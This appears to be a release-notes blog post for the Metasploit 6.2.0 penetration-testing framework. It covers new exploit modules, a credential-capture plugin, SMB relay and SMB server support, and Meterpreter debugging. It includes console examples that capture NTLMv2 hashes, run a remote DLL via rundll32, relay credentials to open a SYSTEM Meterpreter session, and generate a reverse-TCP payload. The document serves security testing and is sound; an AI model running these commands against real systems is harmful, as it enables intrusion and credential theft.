Last updated at Thu, 09 Jun 2022 16:46:00 GMT
Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we’ve added:
- 138 new modules
- 148 enhancements and features
- 156 bug fixes
Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).
- VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as
SYSTEM. This exploit has been tested on both Windows and Linux targets.
- F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 18.104.22.168. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the
rootuser on affected systems.
- VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
- Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the
nobodyuser. The vulnerability was discovered by Rapid7 researcher Jake Baines.
Local Privilege Escalation
- CVE-2022-21999 SpoolFool Privesc by Oliver Lyak and Shelby Pace, which exploits CVE-2022-21999: A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.
- Dirty Pipe Local Privilege Escalation via CVE-2022-0847 by Max Kellermann and timwr, which exploits CVE-2022-0847: A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the
Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the
auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.
After running the
load capture command, the
captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.
In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:
msf6 > load capture [*] Successfully loaded plugin: Credential Capture msf6 > captureg start --ip 192.168.123.128 Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339 [+] Authentication Capture: DRDA (DB2, Informix, Derby) started [+] Authentication Capture: FTP started [+] HTTP Client MS Credential Catcher started [+] HTTP Client MS Credential Catcher started [+] Authentication Capture: IMAP started [+] Authentication Capture: MSSQL started [+] Authentication Capture: MySQL started [+] Authentication Capture: POP3 started [+] Authentication Capture: PostgreSQL started [+] Printjob Capture Service started [+] Authentication Capture: SIP started [+] Authentication Capture: SMB started [+] Authentication Capture: SMTP started [+] Authentication Capture: Telnet started [+] Authentication Capture: VNC started [+] Authentication Capture: FTP started [+] Authentication Capture: IMAP started [+] Authentication Capture: POP3 started [+] Authentication Capture: SMTP started [+] NetBIOS Name Service Spoofer started [+] LLMNR Spoofer started [+] mDNS Spoofer started [+] Started capture jobs
Opening a new terminal in conjunction with the
tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:
$ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt [+] Received SMB connection on Auth Capture Server! [SMB] NTLMv2-SSP Client : 192.168.123.136 [SMB] NTLMv2-SSP Username : EXAMPLE\Administrator [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000
It is also possible to log directly to stdout without using the
captureg start --ip 192.168.123.128 --stdout
SMB v3 server support
This work builds upon the SMB v3 client support added in Metasploit 6.0.
Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.
ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point
This can be useful for copying files onto remote targets, or for running remote DLLs:
copy \\192.168.123.1\home\example.txt . rundll32.exe \\192.168.123.1\home\example.dll,0
All remaining Metasploit modules have now been updated to support SMB v3. Some examples:
exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as
exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning
NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
exploit/windows/smb/smb_relay: Covered in more detail below.
Enhanced SMB relay support
windows/smb/smb_relay has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.
Example module usage:
use windows/smb/smb_relay set RELAY_TARGETS 192.168.123.4 192.168.123.25 set JOHNPWFILE ./relay_results.txt run
Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:
msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22 [*] Received request for \admin [*] Relaying to next target smb://192.168.123.4:445 [+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445 [SMB] NTLMv2-SSP Client : 192.168.123.4 [SMB] NTLMv2-SSP Username : \admin [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000 [*] Received request for \admin [*] identity: \admin - All targets relayed to [*] 192.168.123.4:445 - Selecting PowerShell target [*] Received request for \admin [*] identity: \admin - All targets relayed to [*] 192.168.123.4:445 - Executing the payload... [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175174 bytes) to 192.168.123.4 [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000
A session will be opened on the relay target with the associated credentials:
msf6 exploit(windows/smb/smb_relay) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)
Further details can be found in the Metasploit SMB Relay documentation.
Improved pivoting / NATed services support
Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.
When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.
For example, with the network configuration:
Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)
The Metasploit module commands would be:
# Set where the target connects to Metasploit. ListenerBindAddress is a new option. set srvhost 10.2.3.4 set ListenerBindAddress 172.31.21.26 # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option. set lhost 10.2.3.4 set ReverseListenerBindAddress 172.31.21.26
Debugging Meterpreter sessions
There are now two ways to debug Meterpreter sessions:
- Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
- Generate a custom Meterpreter debug build with extra logging present
Log Meterpreter TLV packets
This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:
msf6 > setg SessionTlvLogging true SessionTlvLogging => true
Here’s an example of logging the network traffic when running the
getenv Meterpreter command:
meterpreter > getenv USER SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[ #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv> #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value="73717259684850511890564936718272"> #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value="USER"> ]> RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[ #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24"> #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv> #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value="73717259684850511890564936718272"> #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0> #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[ #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value="USER"> #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value="demo_user"> ]> ]> Environment Variables ===================== Variable Value -------- ----- USER demo_user
Meterpreter debug builds
We have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set
MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting
For example, within msfconsole you can generate a new payload and create a handler:
use payload/python/meterpreter_reverse_tcp generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false to_handler
Running the payload will show the Meterpreter log output:
$ python3 shell.py DEBUG:root:[*] running method core_negotiate_tlv_encryption DEBUG:root:[*] Negotiating TLV encryption DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001 DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966 DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46 DEBUG:root:[*] TLV encryption sorted DEBUG:root:[*] sending response packet DEBUG:root:[*] running method core_set_session_guid DEBUG:root:[*] sending response packet DEBUG:root:[*] running method core_enumextcmd DEBUG:root:[*] sending response packet DEBUG:root:[*] running method core_enumextcmd DEBUG:root:[*] sending response packet ... etc ...
For full details, see the Debugging Meterpreter Sessions documentation.
We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information for multiple topics including:
- Common Metasploit workflows
- Upgrading shells to Meterpreter
- Installation guides
- Module development resources
- ... and more!
Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.
Local exploit suggester improvements
post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.
Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:
msf6 post(multi/recon/local_exploit_suggester) > run session=-1 ... etc ... [*] ::1 - Valid modules for session 3: ============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable. 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable. 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated. 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated. 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105. 8 exploit/linux/local/su_login Yes The target appears to be vulnerable. 9 exploit/android/local/futex_requeue No The check raised an exception. 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable. 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable. 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable. 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable. 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception. 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.
Setting the option
verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.
Upcoming roadmap work
In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.
Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the